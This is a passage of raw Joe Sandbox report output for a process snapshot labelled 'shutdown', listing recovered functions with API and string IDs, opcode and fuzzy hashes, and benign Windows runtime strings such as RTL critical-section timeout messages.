                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                      • Instruction Fuzzy Hash: EB81CF70E052499FDF28DE68CA917FEBBBAAF453A0F1C465AD861A77D0C7349840CB50
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: ___swprintf_l
                      • String ID: %%%u$[$]:%u
                      • API String ID: 48624451-2819853543
                      • Opcode ID: 33a8c9bbfcaf12fa829dbb6fce8dc90c1ada09867ed4473d05efd8af5be2f409
                      • Instruction ID: b48394b8f68294edfdf6411c5e129a40d6c1bd56a9b0af9c40772b97e5ae015a
                      • Opcode Fuzzy Hash: 33a8c9bbfcaf12fa829dbb6fce8dc90c1ada09867ed4473d05efd8af5be2f409
                      • Instruction Fuzzy Hash: 3B213576E10229ABDB50DF7DDD40EEEBBF8EF94644F48051AE915D7201E730D9018BA1
                      Strings
                      • RTL: Re-Waiting, xrefs: 039E031E
                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 039E02BD
                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 039E02E7
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID:
                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                      • API String ID: 0-2474120054
                      • Opcode ID: 1e657f2c4dc9fdc8385e66d91c4ffa1b89bc64eb53a93f876f5192fa2abce61f
                      • Instruction ID: 70ced97042af3d4b37831f12c1d691a3fc42fa27b17dd22d6f6573cc939a49d4
                      • Opcode Fuzzy Hash: 1e657f2c4dc9fdc8385e66d91c4ffa1b89bc64eb53a93f876f5192fa2abce61f
                      • Instruction Fuzzy Hash: F4E1BD346047419FEB25CF2DC884B6AF7E8BB88354F180A5AE4A6CB3E1D774D845CB52
                      Strings
                      • RTL: Re-Waiting, xrefs: 039E7BAC
                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 039E7B7F
                      • RTL: Resource at %p, xrefs: 039E7B8E
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID:
                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                      • API String ID: 0-871070163
                      • Opcode ID: ea59b6d81f06acd1af6fb7b70dad980175ee96f2d759fd2086349a72024ddb61
                      • Instruction ID: ea2dfa4246fb675db8f650a7b2753c70014488ce16d3964792a363792a7a6ce3
                      • Opcode Fuzzy Hash: ea59b6d81f06acd1af6fb7b70dad980175ee96f2d759fd2086349a72024ddb61
                      • Instruction Fuzzy Hash: B841E235304B029FC724DE69C940B6AB7E9EF88760F180A1DF95A9B680DB31E8058BD1
                      APIs
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 039E728C
                      Strings
                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 039E7294
                      • RTL: Re-Waiting, xrefs: 039E72C1
                      • RTL: Resource at %p, xrefs: 039E72A3
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                      • API String ID: 885266447-605551621
                      • Opcode ID: 775b5b5745133d21254d2cf7b5dd7b7e191c1ac7c796af5c8cb0c8449e49a15b
                      • Instruction ID: 360da0b16a8fce9359897737ea118165dac87e64c4f77f5b9cb9ae4664e96534
                      • Opcode Fuzzy Hash: 775b5b5745133d21254d2cf7b5dd7b7e191c1ac7c796af5c8cb0c8449e49a15b
                      • Instruction Fuzzy Hash: E441CF35700706AFD721DE69CC41B6AB7A9FB84750F140A19F955AB340DB31E84287D2
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: ___swprintf_l
                      • String ID: %%%u$]:%u
                      • API String ID: 48624451-3050659472
                      • Opcode ID: 37996fef19f88dcc5a3218a2dc48ec4dbb7dca8a1f6aebf8dc1930510737812d
                      • Instruction ID: b3106b339faf9d20e631dbecab66a4fa5e852c09d8fe0d275e21fa626e91ecb6
                      • Opcode Fuzzy Hash: 37996fef19f88dcc5a3218a2dc48ec4dbb7dca8a1f6aebf8dc1930510737812d
                      • Instruction Fuzzy Hash: DB316676A102299FDB60DF2DCD40FEEB7F8EF44610F44455AE849E7241EB30EA459BA0
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: __aulldvrm
                      • String ID: +$-
                      • API String ID: 1302938615-2137968064
                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                      • Instruction ID: 4a15255d2160af2b202b489184997122c819f064de34afb088a9983c607fe85f
                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                      • Instruction Fuzzy Hash: 0891A671E002169BDF24DEA9CA806FEB7B9EFC47A0F18471AE865EB2D0D73099408714
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID:
                      • String ID: $$@
                      • API String ID: 0-1194432280
                      • Opcode ID: de7b9d795fc357cdcbd6aa208658a6401657d692b3e2212c572364c75e098782
                      • Instruction ID: cf16b4470d076be48e01553c66e25957e5aa62c5fa14d1c4c0431ccd5c2dbf60
                      • Opcode Fuzzy Hash: de7b9d795fc357cdcbd6aa208658a6401657d692b3e2212c572364c75e098782
                      • Instruction Fuzzy Hash: C1811875D002699BDB31DF54CC45BEEB7B8AB48750F0485EAE919B7280E7309E85CFA0
                      APIs
                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 039FCFBD
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: CallFilterFunc@8
                      • String ID: @$@4_w@4_w
                      • API String ID: 4062629308-713214301
                      • Opcode ID: c10a19d300c7ce539456387ec2820231830a0b948dad4d5aed2dc284c6643bfc
                      • Instruction ID: a01887efed3650cc55f1d68bed059d73ca6022065f2d49a9343bfb25e359c4ad
                      • Opcode Fuzzy Hash: c10a19d300c7ce539456387ec2820231830a0b948dad4d5aed2dc284c6643bfc
                      • Instruction Fuzzy Hash: 65419475900218EFCB21EFA9C840A6DFBB8FF95B00F04442AEA15DF265D734D901CB65